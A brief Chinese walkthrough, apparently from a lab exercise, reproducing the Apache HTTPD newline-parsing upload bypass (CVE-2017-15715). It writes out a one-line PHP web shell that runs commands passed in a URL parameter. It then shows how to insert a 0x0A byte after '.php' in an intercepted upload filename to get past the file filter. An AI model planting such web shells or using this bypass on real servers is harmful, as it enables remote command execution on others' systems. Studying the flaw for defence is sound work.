重现Apache HTTPD换行解析漏洞 (CVE-2017-15715)：操作演示

Web页面：

新建一个一句话木马：

0.php

<?php system($_GET[0]); ?>

上传木马， burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容（hex），内容是以16进制显示的，找到文件名那一栏，在 .php 的后面添加换行符，在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后，我们访问一下。发现木马上传成功。